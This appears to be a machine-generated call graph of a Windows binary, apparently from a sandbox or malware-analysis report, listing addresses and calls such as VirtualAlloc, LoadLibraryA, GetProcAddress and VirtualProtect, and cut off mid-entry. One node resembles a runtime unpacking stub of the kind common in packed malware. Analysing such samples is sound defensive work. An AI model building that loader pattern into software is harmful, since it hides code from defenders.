17682->17680 17682->17681 17684->17584 17685->17588 17697 4002400 17698 4002420 VirtualAlloc 17697->17698 17699 400250f 17697->17699 17700 4002467 VirtualAlloc 17698->17700 17701 400247d 17698->17701 17700->17701 17701->17699 17703 4001a50 17701->17703 17706 4001a30 GetPEB 17703->17706 17705 4001a88 17705->17699 17706->17705 17707 401a200 17722 4019e9d codecvt _strnlen 17707->17722 17708 401a215 17709 4019a80 __VEC_memcpy 17708->17709 17710 401a23b 17709->17710 17711 401a37a 17710->17711 17713 4006ca0 _realloc __VEC_memcpy 17710->17713 17712 401a3b9 17714 4019a80 __VEC_memcpy 17712->17714 17719 401a26f 17713->17719 17716 401a3df 17714->17716 17715 4019ea9 17717 401a54a 17716->17717 17718 4006ca0 _realloc __VEC_memcpy 17716->17718 17721 401a413 17718->17721 17720 4019a80 __VEC_memcpy 17719->17720 17720->17711 17721->17717 17723 4006ca0 _realloc __VEC_memcpy 17721->17723 17722->17708 17722->17712 17722->17715 17724 4019fb2 17722->17724 17723->17717 17734 4019a80 17724->17734 17733 401a130 17737 4019a8d _memset codecvt 17734->17737 17735 4019aab 17735->17733 17738 4006ca0 17735->17738 17736 4006ca0 _realloc __VEC_memcpy 17736->17737 17737->17735 17737->17736 17739 4006cb8 17738->17739 17740 4006ce7 17739->17740 17741 4006cdf __VEC_memcpy 17739->17741 17741->17740 18352 40264c3 18370 40263dd _Smanip codecvt 18352->18370 18353 40264d8 18371 4025580 18353->18371 18358 40255a0 __VEC_memcpy 18359 4026555 18358->18359 18360 40255a0 __VEC_memcpy 18359->18360 18367 402657a 18360->18367 18361 4024ae0 __VEC_memcpy 18361->18370 18363 4026403 18364 4026697 18365 4024ae0 __VEC_memcpy 18364->18365 18366 40266b1 codecvt 18365->18366 18367->18364 18377 4024ae0 18367->18377 18369 40255a0 __VEC_memcpy 18369->18370 18370->18353 18370->18361 18370->18363 18370->18369 18381 40255c0 18370->18381 18372 4024ae0 __VEC_memcpy 18371->18372 18373 402559b 18372->18373 18374 40255a0 18373->18374 18375 4024ae0 __VEC_memcpy 18374->18375 18376 40255bb 18375->18376 18376->18358 18380 4024aea _memset codecvt 18377->18380 18378 4024af6 18378->18364 18379 4006ca0 __VEC_memcpy _realloc 18379->18380 18380->18378 18380->18379 18382 40257f0 codecvt __crtGetStringTypeA_stat 18381->18382 18383 40255e4 18381->18383 18382->18370 18397 4022540 18383->18397 18385 402563f 18385->18382 18386 4006ca0 _realloc __VEC_memcpy 18385->18386 18387 40256e8 18386->18387 18388 4006ca0 _realloc __VEC_memcpy 18387->18388 18389 402570f 18388->18389 18390 4006ca0 _realloc __VEC_memcpy 18389->18390 18391 4025757 18390->18391 18392 4006ca0 _realloc __VEC_memcpy 18391->18392 18393 402579d 18392->18393 18394 4006ca0 _realloc __VEC_memcpy 18393->18394 18395 40257c4 18394->18395 18396 4006ca0 _realloc __VEC_memcpy 18395->18396 18396->18382 18398 4022565 18397->18398 18400 4022647 codecvt 18397->18400 18399 4006ca0 _realloc __VEC_memcpy 18398->18399 18398->18400 18399->18400 18400->18385 18401 4018ec0 18404 4018ec3 18401->18404 18402 4018ed6 18404->18402 18405 40196c0 18404->18405 18406 40196d0 codecvt 18405->18406 18407 4019847 18406->18407 18409 401b730 18406->18409 18407->18404 18424 401b747 18409->18424 18410 401b7ba 18427 401b650 18410->18427 18411 401b7d7 18413 401b650 __VEC_memcpy 18411->18413 18418 401b755 18413->18418 18414 401b890 18415 401b8b9 18414->18415 18439 401b430 18414->18439 18415->18418 18422 401b650 __VEC_memcpy 18415->18422 18416 401b901 18421 401b650 __VEC_memcpy 18416->18421 18418->18406 18419 401b80d 18419->18418 18420 401b650 __VEC_memcpy 18419->18420 18420->18418 18421->18418 18422->18418 18424->18410 18424->18411 18424->18414 18424->18416 18424->18418 18424->18419 18445 401acb0 18424->18445 18451 401afe0 18424->18451 18457 401b240 18424->18457 18428 401b681 18427->18428 18429 401b669 18427->18429 18431 401b6a2 18428->18431 18432 401b68a 18428->18432 18430 401acb0 __VEC_memcpy 18429->18430 18438 401b67f 18430->18438 18434 401b6c3 18431->18434 18435 401b6ab 18431->18435 18433 401afe0 __VEC_memcpy 18432->18433 18433->18438 18437 401b430 __VEC_memcpy 18434->18437 18434->18438 18436 401b240 __VEC_memcpy 18435->18436 18436->18438 18437->18438 18438->18418 18440 401b440 18439->18440 18441 401b4ce 18440->18441 18442 401a890 __VEC_memcpy 18440->18442 18444 401b45a 18440->18444 18443 401cd80 __VEC_memcpy 18441->18443 18442->18440 18443->18444 18444->18415 18450 401acce 18445->18450 18446 401ad5a 18447 401cd80 __VEC_memcpy 18446->18447 18448 401ace5 codecvt 18447->18448 18448->18424 18449 401a890 __VEC_memcpy 18449->18450 18450->18446 18450->18448 18450->18449 18455 401affe 18451->18455 18452 401b083 18453 401cd80 __VEC_memcpy 18452->18453 18454 401b015 codecvt 18453->18454 18454->18424 18455->18452 18455->18454 18456 401a890 __VEC_memcpy 18455->18456 18456->18455 18459 401b250 18457->18459 18458 401b2d5 18460 401cd80 __VEC_memcpy 18458->18460 18459->18458 18461 401a890 __VEC_memcpy 18459->18461 18462 401b267 18459->18462 18460->18462 18461->18459 18462->18424 18573 4018f00 18576 4018f06 codecvt 18573->18576 18574 4018f0c 18576->18574 18577 401c850 18576->18577 18581 401c860 codecvt 18577->18581 18578 401c866 18578->18576 18581->18578 18582 4023590 18581->18582 18588 4028060 18581->18588 18587 40235aa _memset codecvt 18582->18587 18583 40235b6 __crtGetStringTypeA_stat 18583->18581 18584 4006ca0 _realloc __VEC_memcpy 18584->18587 18585 40228b0 __VEC_memcpy 18585->18587 18587->18583 18587->18584 18587->18585 18592 4005330 18587->18592 18590 402806d 18588->18590 18589 402808b 18589->18581 18590->18589 18598 4027050 18590->18598 18593 4005346 _memset 18592->18593 18594 401efb0 __VEC_memcpy 18593->18594 18595 4005352 18594->18595 18596 4006ca0 _realloc __VEC_memcpy 18595->18596 18597 4005386 18596->18597 18597->18587 18605 4027060 _memset 18598->18605 18599 40048c0 __VEC_memcpy 18599->18605 18600 4027078 codecvt 18600->18590 18601 40044b0 __VEC_memcpy 18601->18605 18602 4004600 __VEC_memcpy 18602->18605 18603 4004b60 __VEC_memcpy 18603->18605 18604 4004d10 __VEC_memcpy 18604->18605 18605->18599 18605->18600 18605->18601 18605->18602 18605->18603 18605->18604 18608 4006ca0 __VEC_memcpy _realloc 18605->18608 18612 4026a70 18605->18612 18616 4026200 18605->18616 18620 4025ba0 18605->18620 18624 40259d0 18605->18624 18628 4025d70 18605->18628 18608->18605 18614 4026a7d _memset 18612->18614 18613 4026a8f 18613->18605 18614->18613 18632 4025f40 18614->18632 18618 402620d _memset 18616->18618 18617 402621f 18617->18605 18618->18617 18636 4025290 18618->18636 18622 4025bad _memset 18620->18622 18621 4025bbf 18621->18605 18622->18621 18640 4024e20 18622->18640 18626 40259dd _memset 18624->18626 18625 40259ef 18625->18605 18626->18625 18644 4024c40 18626->18644 18630 4025d7d _memset 18628->18630 18629 4025d8f 18629->18605 18630->18629 18648 4025020 18630->18648 18634 4025f4a _memset codecvt 18632->18634 18633 4025f5c 18633->18614 18634->18633 18635 4006ca0 __VEC_memcpy _realloc 18634->18635 18635->18634 18639 402529a _memset 18636->18639 18637 40252ac 18637->18618 18638 4006ca0 __VEC_memcpy _realloc 18638->18639 18639->18637 18639->18638 18642 4024e2a _memset 18640->18642 18641 4024e3c 18641->18622 18642->18641 18643 4006ca0 __VEC_memcpy _realloc 18642->18643 18643->18642 18646 4024c4a _memset 18644->18646 18645 4024c5c 18645->18626 18646->18645 18647 4006ca0 _realloc __VEC_memcpy 18646->18647 18647->18646 18650 402502a _memset 18648->18650 18649 402503c 18649->18630 18650->18649 18651 4006ca0 __VEC_memcpy _realloc 18650->18651 18651->18650 18729 4019340 18733 4019354 codecvt 18729->18733 18730 401941f 18733->18730 18734 4018bd0 18733->18734 18738 4019240 18733->18738 18737 4018be0 18734->18737 18735 4018beb 18735->18733 18737->18735 18742 4016b00 18737->18742 18739 4019250 18738->18739 18741 401932b 18739->18741 18781 401c800 18739->18781 18741->18733 18743 4016b16 codecvt 18742->18743 18745 4016c96 18743->18745 18746 4017d10 18743->18746 18745->18737 18769 4017d27 std::_Iterator_base::_Iterator_base _strlen 18746->18769 18747 401ee80 __VEC_memcpy 18747->18769 18748 40186c9 18748->18743 18749 4017df5 18750 4017e18 18749->18750 18751 4017f4c 18749->18751 18771 4017d5a 18749->18771 18755 4017e37 18750->18755 18756 4017e96 18750->18756 18750->18771 18753 4017fd3 18751->18753 18754 4017f58 18751->18754 18752 40060a0 __VEC_memcpy 18752->18769 18757 40194d0 __VEC_memcpy 18753->18757 18762 4017f93 18754->18762 18763 401fea0 __VEC_memcpy 18754->18763 18754->18771 18759 4017e5e 18755->18759 18765 401fea0 __VEC_memcpy 18755->18765 18761 40194d0 __VEC_memcpy 18756->18761 18760 4017ffb 18757->18760 18758 4024600 __VEC_memcpy 18758->18769 18766 40195c0 __VEC_memcpy 18759->18766 18770 401fea0 __VEC_memcpy 18760->18770 18760->18771 18767 4017ebf 18761->18767 18764 40195c0 __VEC_memcpy 18762->18764 18763->18762 18764->18771 18765->18759 18766->18771 18767->18771 18773 401fea0 __VEC_memcpy 18767->18773 18768 401fea0 __VEC_memcpy 18774 40185bd codecvt 18768->18774 18769->18747 18769->18749 18769->18752 18769->18758 18769->18771 18772 4017350 __VEC_memcpy 18769->18772 18775 401844f 18769->18775 18778 4017b40 __VEC_memcpy 18769->18778 18770->18771 18771->18748 18771->18768 18771->18774 18772->18769 18773->18771 18774->18748 18780 4006410 __VEC_memcpy 18774->18780 18776 4017350 __VEC_memcpy 18775->18776 18777 4018473 18776->18777 18777->18771 18779 4017b40 __VEC_memcpy 18777->18779 18778->18769 18779->18771 18780->18748 18782 401c810 18781->18782 18783 401c816 18782->18783 18785 40263d0 18782->18785 18783->18739 18797 40263dd _Smanip codecvt 18785->18797 18786 4026403 18786->18782 18787 40255a0 __VEC_memcpy 18787->18797 18788 40264d8 18789 4025580 __VEC_memcpy 18788->18789 18790 402650b 18789->18790 18791 40255a0 __VEC_memcpy 18790->18791 18792 4026530 18791->18792 18793 40255a0 __VEC_memcpy 18792->18793 18794 4026555 18793->18794 18795 40255a0 __VEC_memcpy 18794->18795 18802 402657a 18795->18802 18796 4024ae0 __VEC_memcpy 18796->18797 18797->18786 18797->18787 18797->18788 18797->18796 18798 40255c0 __VEC_memcpy 18797->18798 18798->18797 18799 4026697 18800 4024ae0 __VEC_memcpy 18799->18800 18801 40266b1 codecvt 18800->18801 18801->18782 18802->18799 18803 4024ae0 __VEC_memcpy 18802->18803 18803->18799 17742 4014c03 17746 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 17742->17746 17747 4014ea7 __crtGetStringTypeA_stat 17746->17747 17750 401e730 17746->17750 17754 401ebc0 17746->17754 17758 4020050 17746->17758 17762 401f9f0 17746->17762 17766 401efb0 17746->17766 17752 401e73d _strlen 17750->17752 17751 401e749 17751->17746 17752->17751 17753 4006ca0 _realloc __VEC_memcpy 17752->17753 17753->17752 17756 401ebcd _memset codecvt _strlen 17754->17756 17755 401ebe5 17755->17746 17756->17755 17757 4006ca0 __VEC_memcpy _realloc 17756->17757 17757->17756 17759 4020069 _vwprintf 17758->17759 17760 401f9f0 __VEC_memcpy 17759->17760 17761 40200c1 codecvt 17760->17761 17761->17746 17764 401fa0f _memset codecvt _strlen 17762->17764 17763 401fa1b __crtGetStringTypeA_stat 17763->17746 17764->17763 17765 4006ca0 __VEC_memcpy _realloc 17764->17765 17765->17764 17768 401efbd _strlen 17766->17768 17767 401efc3 17767->17746 17768->17767 17769 4006ca0 _realloc __VEC_memcpy 17768->17769 17769->17768 18804 401ad47 18805 401acce 18804->18805 18806 401ad5a 18805->18806 18807 401a890 __VEC_memcpy 18805->18807 18809 401ace5 codecvt 18805->18809 18808 401cd80 __VEC_memcpy 18806->18808 18807->18805 18808->18809 18952 4013fcb 18956 4013f63 codecvt _memcmp _strlen 18952->18956 18953 4013f75 18954 4013f50 __VEC_memcpy 18954->18956 18955 40111a0 __VEC_memcpy 18955->18956 18956->18953 18956->18954 18956->18955 18957 4006ca0 __VEC_memcpy _realloc 18956->18957 18958 4010d70 __VEC_memcpy 18956->18958 18957->18956 18958->18956 18959 40193cb 18963 4019354 codecvt 18959->18963 18960 401941f 18961 4018bd0 __VEC_memcpy 18961->18963 18962 4019240 __VEC_memcpy 18962->18963 18963->18960 18963->18961 18963->18962 17770 401ac10 17773 4019e90 17770->17773 17772 401ac35 codecvt 17775 4019e9d codecvt _strnlen 17773->17775 17774 4019ea9 17774->17772 17775->17774 17776 4019fb2 17775->17776 17778 401a215 17775->17778 17779 401a3b9 17775->17779 17777 4019a80 __VEC_memcpy 17776->17777 17780 4019fd7 17777->17780 17781 4019a80 __VEC_memcpy 17778->17781 17782 4019a80 __VEC_memcpy 17779->17782 17786 4006ca0 _realloc __VEC_memcpy 17780->17786 17799 401a130 17780->17799 17783 401a23b 17781->17783 17785 401a3df 17782->17785 17784 401a37a 17783->17784 17787 4006ca0 _realloc __VEC_memcpy 17783->17787 17784->17772 17788 401a54a 17785->17788 17789 4006ca0 _realloc __VEC_memcpy 17785->17789 17790 401a00a 17786->17790 17791 401a26f 17787->17791 17788->17772 17792 401a413 17789->17792 17793 401a138 17790->17793 17794 401a0fb 17790->17794 17796 4019a80 __VEC_memcpy 17791->17796 17792->17788 17798 4006ca0 _realloc __VEC_memcpy 17792->17798 17797 4006ca0 _realloc __VEC_memcpy 17793->17797 17793->17799 17795 4019a80 __VEC_memcpy 17794->17795 17795->17799 17796->17784 17797->17799 17798->17788 17799->17772 18890 4014b94 18897 4014b55 codecvt std::_Iterator_base::_Iterator_base _strlen 18890->18897 18891 4014ea7 __crtGetStringTypeA_stat 18892 401e730 __VEC_memcpy 18892->18897 18893 401efb0 __VEC_memcpy 18893->18897 18894 401f9f0 __VEC_memcpy 18894->18897 18895 401ebc0 __VEC_memcpy 18895->18897 18896 4020050 __VEC_memcpy 18896->18897 18897->18891 18897->18892 18897->18893 18897->18894 18897->18895 18897->18896 18898 4019f9d 18924 4019e9d codecvt _strnlen 18898->18924 18899 4019fb2 18900 4019a80 __VEC_memcpy 18899->18900 18901 4019fd7 18900->18901 18904 4006ca0 _realloc __VEC_memcpy 18901->18904 18919 401a130 18901->18919 18902 401a215 18905 4019a80 __VEC_memcpy 18902->18905 18903 401a3b9 18906 4019a80 __VEC_memcpy 18903->18906 18914 401a00a 18904->18914 18908 401a23b 18905->18908 18910 401a3df 18906->18910 18907 4019ea9 18909 401a37a 18908->18909 18911 4006ca0 _realloc __VEC_memcpy 18908->18911 18912 401a54a 18910->18912 18913 4006ca0 _realloc __VEC_memcpy 18910->18913 18917 401a26f 18911->18917 18920 401a413 18913->18920 18915 401a138 18914->18915 18916 401a0fb 18914->18916 18915->18919 18921 4006ca0 _realloc __VEC_memcpy 18915->18921 18918 4019a80 __VEC_memcpy 18916->18918 18922 4019a80 __VEC_memcpy 18917->18922 18918->18919 18920->18912 18923 4006ca0 _realloc __VEC_memcpy 18920->18923 18921->18919 18922->18909 18923->18912 18924->18899 18924->18902 18924->18903 18924->18907 18964 401cddc 18967 401cd90 codecvt 18964->18967 18965 401cda8 18966 4006ca0 _realloc __VEC_memcpy 18966->18967 18967->18965 18967->18966 18968 40145df 18976 4014500 codecvt std::_Iterator_base::_Iterator_base _strlen 18968->18976 18969 40145f4 18970 401e8c0 __VEC_memcpy 18969->18970 18972 4014616 _memset 18970->18972 18971 401fc90 __VEC_memcpy 18971->18976 18973 401467b 18972->18973 18977 4006ca0 _realloc __VEC_memcpy 18972->18977 18978 4014692 codecvt 18972->18978 18975 4006ca0 _realloc __VEC_memcpy 18973->18975 18974 401450c 18975->18978 18976->18969 18976->18971 18976->18974 18977->18973 18666 401b91e 18670 401b747 18666->18670 18667 401b240 __VEC_memcpy 18667->18670 18668 401b7ba 18671 401b650 __VEC_memcpy 18668->18671 18669 401b7d7 18672 401b650 __VEC_memcpy 18669->18672 18670->18667 18670->18668 18670->18669 18673 401b890 18670->18673 18675 401b901 18670->18675 18677 401b755 18670->18677 18678 401b80d 18670->18678 18682 401acb0 __VEC_memcpy 18670->18682 18683 401afe0 __VEC_memcpy 18670->18683 18671->18677 18672->18677 18674 401b8b9 18673->18674 18676 401b430 __VEC_memcpy 18673->18676 18674->18677 18681 401b650 __VEC_memcpy 18674->18681 18680 401b650 __VEC_memcpy 18675->18680 18676->18674 18678->18677 18679 401b650 __VEC_memcpy 18678->18679 18679->18677 18680->18677 18681->18677 18682->18670 18683->18670 17688 408bf20 17689 408bf30 17688->17689 17690 408c04a LoadLibraryA 17689->17690 17693 408c08f VirtualProtect VirtualProtect 17689->17693 17691 408c061 17690->17691 17691->17689 17695 408c073 GetProcAddress 17691->17695 17694 408c0f4 17693->17694 17694->17694 17695->17691 17696 408c089 ExitProcess 17695->17696 17800 401422a 17802 4013f63 codecvt _memcmp _strlen 17800->17802 17801 4013f75 17802->17801 17804 4013f50 __VEC_memcpy 17802->17804 17806 4006ca0 __VEC_memcpy _realloc 17802->17806 17807 4010d70 17802->17807 17811 40111a0 17802->17811 17804->17802 17806->17802 17810 4010d7d _strlen 17807->17810 17808 4010d8f 17808->17802 17809 4006ca0 __VEC_memcpy _realloc 17809->17810 17810->17808 17810->17809 17814 40111ad _memcmp 17811->17814 17812 40111b9 17812->17802 17813 4006ca0 __VEC_memcpy _realloc 17813->17814 17814->17812 17814->17813 17819 401362f 17823 40135d4 codecvt std::_Iterator_base::_Iterator_base 17819->17823 17820 40135da 17821 401f9f0 __VEC_memcpy 17821->17823 17823->17820 17823->17821 17824 4015c60 17823->17824 17825 4015c79 codecvt std::_Iterator_base::_Iterator_base _strlen 17824->17825 17827 4015c7f __crtGetStringTypeA_stat 17825->17827 17831 401f9f0 __VEC_memcpy 17825->17831 17832 4013f50 17825->17832 17839 4015360 17825->17839 17883 401f6b0 17825->17883 17887 401f7c0 17825->17887 17827->17823 17831->17825 17837 4013f63 codecvt _memcmp _strlen 17832->17837 17833 4013f75 17833->17825 17834 4013f50 __VEC_memcpy 17834->17837 17835 40111a0 __VEC_memcpy 17835->17837 17836 4006ca0 __VEC_memcpy _realloc 17836->17837 17837->17833 17837->17834 17837->17835 17837->17836 17838 4010d70 __VEC_memcpy 17837->17838 17838->17837 17877 401537b codecvt 17839->17877 17840 4015381 17840->17825 17844 4013d30 __VEC_memcpy 17844->17877 17845 4015c60 __VEC_memcpy 17845->17877 17847 401f9f0 __VEC_memcpy 17847->17877 17877->17840 17877->17844 17877->17845 17877->17847 17891 4013e40 17877->17891 17897 4014850 17877->17897 17902 40135c0 17877->17902 17907 4014460 17877->17907 17911 40137a0 17877->17911 17915 4013410 17877->17915 17919 40132e0 17877->17919 17924 4013130 17877->17924 17929 4012f90 17877->17929 17934 4012d20 17877->17934 17941 4012c80 17877->17941 17945 40122e0 17877->17945 17949 4012270 17877->17949 17953 4012200 17877->17953 17957 40123f0 17877->17957 17961 40129a0 17877->17961 17966 4012840 17877->17966 17971 40126b0 17877->17971 17976 4012470 17877->17976 17981 4012b90 17877->17981 17986 4015eb0 17877->17986 17991 4012b10 17877->17991 17995 4012360 17877->17995 17999 4012120 17877->17999 18003 4012040 17877->18003 18007 4015080 17877->18007 18012 4011e70 17877->18012 18016 4011d60 17877->18016 18020 4011c70 17877->18020 18024 4011b50 17877->18024 18028 4011a40 17877->18028 18032 4011930 17877->18032 18036 4011800 17877->18036 18040 40115c0 17877->18040 18046 4014780 17877->18046 18050 40144f0 17877->18050 18061 4014980 17877->18061 18067 4014a70 17877->18067 17885 401f6bd codecvt 17883->17885 17884 401f6d3 17884->17825 17885->17884 17886 4006ca0 __VEC_memcpy _realloc 17885->17886 17886->17885 17889 401f7cd codecvt 17887->17889 17888 401f7e3 17888->17825 17889->17888 17890 4006ca0 __VEC_memcpy _realloc 17889->17890 17890->17889 17895 4013e50 codecvt std::_Iterator_base::_Iterator_base _strlen 17891->17895 17892 4013e56 17892->17877 17893 4006ca0 _realloc __VEC_memcpy 17893->17895 17895->17892 17895->17893 17896 401f9f0 __VEC_memcpy 17895->17896 18072 40162d0 17895->18072 17896->17895 17901 4014860 codecvt std::_Iterator_base::_Iterator_base _strlen 17897->17901 17898 4014866 17898->17877 17899 4006ca0 _realloc __VEC_memcpy 17899->17901 17901->17898 17901->17899 18076 401fc90 17901->18076 17906 40135d4 codecvt std::_Iterator_base::_Iterator_base 17902->17906 17903 40135da 17903->17877 17904 4015c60 __VEC_memcpy 17904->17906 17905 401f9f0 __VEC_memcpy 17905->17906 17906->17903 17906->17904 17906->17905 17909 4014470 codecvt _memcmp _strlen 17907->17909 17908 4014476 17908->17877 17909->17908 18080 401f620 17909->18080 17913 401381b _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17911->17913 17912 4013821 __crtGetStringTypeA_stat 17912->17877 17913->17912 17914 401fc90 __VEC_memcpy 17913->17914 17914->17913 17917 401342f _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17915->17917 17916 4013435 __crtGetStringTypeA_stat 17916->17877 17917->17916 17918 401fc90 __VEC_memcpy 17917->17918 17918->17917 17922 40132f0 codecvt std::_Iterator_base::_Iterator_base _strlen 17919->17922 17920 40132f6 17920->17877 17921 4006ca0 _realloc __VEC_memcpy 17921->17922 17922->17920 17922->17921 17923 401fc90 __VEC_memcpy 17922->17923 17923->17922 17927 4013140 codecvt std::_Iterator_base::_Iterator_base _strlen 17924->17927 17925 4013146 17925->17877 17926 401ebc0 __VEC_memcpy 17926->17927 17927->17925 17927->17926 17928 401fc90 __VEC_memcpy 17927->17928 17928->17927 17931 4012fa0 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17929->17931 17930 4012fa6 17930->17877 17931->17930 17932 4006ca0 _realloc __VEC_memcpy 17931->17932 17933 401fc90 __VEC_memcpy 17931->17933 17932->17931 17933->17931 17939 4012d30 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17934->17939 17935 4012d36 17935->17877 17936 401ebc0 __VEC_memcpy 17936->17939 17938 4006ca0 _realloc __VEC_memcpy 17938->17939 17939->17935 17939->17936 17939->17938 17940 401fc90 __VEC_memcpy 17939->17940 18084 40228b0 17939->18084 17940->17939 17942 4012c9a std::_Iterator_base::_Iterator_base 17941->17942 17943 401fc90 __VEC_memcpy 17942->17943 17944 4012d06 __crtGetStringTypeA_stat 17942->17944 17943->17942 17944->17877 17946 40122f0 std::_Iterator_base::_Iterator_base _strlen 17945->17946 17947 401fc90 __VEC_memcpy 17946->17947 17948 401234a 17946->17948 17947->17946 17948->17877 17950 4012280 std::_Iterator_base::_Iterator_base 17949->17950 17951 401fc90 __VEC_memcpy 17950->17951 17952 40122d1 17950->17952 17951->17950 17952->17877 17954 4012210 std::_Iterator_base::_Iterator_base 17953->17954 17955 401fc90 __VEC_memcpy 17954->17955 17956 4012261 17954->17956 17955->17954 17956->17877 17959 4012400 std::_Iterator_base::_Iterator_base _strlen 17957->17959 17958 401fc90 __VEC_memcpy 17958->17959 17959->17958 17960 401245a 17959->17960 17960->17877 17964 40129ba codecvt std::_Iterator_base::_Iterator_base 17961->17964 17962 4015c60 __VEC_memcpy 17962->17964 17963 4012afd __crtGetStringTypeA_stat 17963->17877 17964->17962 17964->17963 17965 401fc90 __VEC_memcpy 17964->17965 17965->17964 17969 401285a codecvt std::_Iterator_base::_Iterator_base 17966->17969 17967 4015c60 __VEC_memcpy 17967->17969 17968 4012989 __crtGetStringTypeA_stat 17968->17877 17969->17967 17969->17968 17970 401fc90 __VEC_memcpy 17969->17970 17970->17969 17975 40126ca codecvt std::_Iterator_base::_Iterator_base _strlen 17971->17975 17972 401fc90 __VEC_memcpy 17972->17975 17973 4015c60 __VEC_memcpy 17973->17975 17974 4012820 __crtGetStringTypeA_stat 17974->17877 17975->17972 17975->17973 17975->17974 17980 401248a _memset codecvt std::_Iterator_base::_Iterator_base _strlen 17976->17980 17977 401fc90 __VEC_memcpy 17977->17980 17978 4015c60 __VEC_memcpy 17978->17980 17979 401269d __crtGetStringTypeA_stat 17979->17877 17980->17977 17980->17978 17980->17979 17983 4012baa codecvt std::_Iterator_base::_Iterator_base 17981->17983 17982 401fc90 __VEC_memcpy 17982->17983 17983->17982 17984 4015c60 __VEC_memcpy 17983->17984 17985 4012c6a __crtGetStringTypeA_stat 17983->17985 17984->17983 17985->17877 17989 4015eca codecvt std::_Iterator_base::_Iterator_base 17986->17989 17987 401fc90 __VEC_memcpy 17987->17989 17988 4015c60 __VEC_memcpy 17988->17989 17989->17987 17989->17988 17990 4015f88 __crtGetStringTypeA_stat 17989->17990 17990->17877 17993 4012b20 std::_Iterator_base::_Iterator_base _strlen 17991->17993 17992 401fc90 __VEC_memcpy 17992->17993 17993->17992 17994 4012b7a 17993->17994 17994->17877 17997 4012370 std::_Iterator_base::_Iterator_base _strlen 17995->17997 17996 401fc90 __VEC_memcpy 17996->17997 17997->17996 17998 40123e2 17997->17998 17998->17877 18002 4012130 std::_Iterator_base::_Iterator_base _strlen 17999->18002 18000 40121f1 18000->17877 18001 401fc90 __VEC_memcpy 18001->18002 18002->18000 18002->18001 18005 4012050 std::_Iterator_base::_Iterator_base _strlen 18003->18005 18004 401210e 18004->17877 18005->18004 18006 401fc90 __VEC_memcpy 18005->18006 18006->18005 18009 4015090 _memset codecvt std::_Iterator_base::_Iterator_base 18007->18009 18008 40150d7 18008->17877 18009->18008 18010 401fc90 __VEC_memcpy 18009->18010 18088 401f1c0 18009->18088 18010->18009 18013 4011ece _memset std::_Iterator_base::_Iterator_base _strlen 18012->18013 18014 401fc90 __VEC_memcpy 18013->18014 18015 4011ffa codecvt __crtGetStringTypeA_stat 18014->18015 18015->17877 18018 4011d70 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18016->18018 18017 4011d78 18017->17877 18018->18017 18019 401fc90 __VEC_memcpy 18018->18019 18019->18018 18022 4011c80 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18020->18022 18021 4011c86 18021->17877 18022->18021 18023 401fc90 __VEC_memcpy 18022->18023 18023->18022 18026 4011b60 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18024->18026 18025 4011b66 18025->17877 18026->18025 18027 401fc90 __VEC_memcpy 18026->18027 18027->18026 18030 4011a50 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18028->18030 18029 4011a56 18029->17877 18030->18029 18031 401fc90 __VEC_memcpy 18030->18031 18031->18030 18033 4011963 _memset std::_Iterator_base::_Iterator_base _strlen 18032->18033 18034 401fc90 __VEC_memcpy 18033->18034 18035 4011a00 codecvt __crtGetStringTypeA_stat 18034->18035 18035->17877 18037 4011810 _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18036->18037 18038 401fc90 __VEC_memcpy 18037->18038 18039 4011926 18037->18039 18038->18037 18039->17877 18043 40115da _memset codecvt std::_Iterator_base::_Iterator_base _strlen 18040->18043 18041 40115ff std::_Iterator_base::_Iterator_base 18042 401fc90 __VEC_memcpy 18041->18042 18044 4011641 __crtGetStringTypeA_stat 18042->18044 18043->18041 18043->18044 18045 401fc90 __VEC_memcpy 18043->18045 18044->17877 18045->18043 18048 4014790 _strlen 18046->18048 18047 4014796 18047->17877 18048->18047 18049 40144f0 __VEC_memcpy 18048->18049 18049->18048 18054 4014500 codecvt std::_Iterator_base::_Iterator_base _strlen 18050->18054 18051 401450c 18051->17877 18052 40145f4 18096 401e8c0 18052->18096 18054->18051 18054->18052 18055 401fc90 __VEC_memcpy 18054->18055 18055->18054 18056 4014616 _memset 18057 401467b 18056->18057 18059 4006ca0 _realloc __VEC_memcpy 18056->18059 18060 4014692 codecvt 18056->18060 18058 4006ca0 _realloc __VEC_memcpy 18057->18058 18058->18060 18059->18057 18060->17877 18066 4014989 codecvt 18061->18066 18062 4014995 18062->17877 18063 401f620 __VEC_memcpy 18063->18066 18065 4006410 __VEC_memcpy 18065->18066 18066->18062 18066->18063 18066->18065 18100 4006620 18066->18100 18070 4014a79 18067->18070 18068 4014a85 18068->17877 18070->18068 18103 4006580 18070->18103 18108 4006410 18070->18108 18074 4016317 _memset 18072->18074 18073 4016320 _memset __crtGetStringTypeA_stat 18073->17895 18074->18073 18075 4006ca0 _realloc __VEC_memcpy 18074->18075 18075->18074 18079 401fc9d codecvt 18076->18079 18077 401fca9 18077->17901 18078 4006ca0 __VEC_memcpy _realloc 18078->18079 18079->18077 18079->18078 18082 401f630 std::_Iterator_base::_Iterator_base 18080->18082 18081 401f690 18081->17909 18082->18081 18083 4006ca0 _realloc __VEC_memcpy 18082->18083 18083->18081 18085 40228c0 18084->18085 18086 402296c codecvt 18084->18086 18085->18086 18087 4006ca0 __VEC_memcpy _realloc 18085->18087 18086->17939 18087->18085 18091 401f1cd _memset codecvt 18088->18091 18089 401f1e5 18089->18009 18091->18089 18092 401f020 18091->18092 18094 401f02d _memset codecvt _strlen 18092->18094 18093 401f045 18093->18091 18094->18093 18095 4006ca0 __VEC_memcpy _realloc 18094->18095 18095->18094 18098 401e8cd 18096->18098 18097 401e8df 18097->18056 18098->18097 18099 4006ca0 _realloc __VEC_memcpy 18098->18099 18099->18098 18101 401efb0 __VEC_memcpy 18100->18101 18102 4006632 18101->18102 18102->18066 18104 401efb0 __VEC_memcpy 18103->18104 18105 4006590 18104->18105 18106 401f620 __VEC_memcpy 18105->18106 18107 40065a0 18106->18107 18107->18070 18109 4006420 std::exception::exception 18108->18109 18110 4006ca0 _realloc __VEC_memcpy 18109->18110 18111 4006455 codecvt 18110->18111 18111->18070 18157 40184af 18186 4017d27 std::_Iterator_base::_Iterator_base _strlen 18157->18186 18158 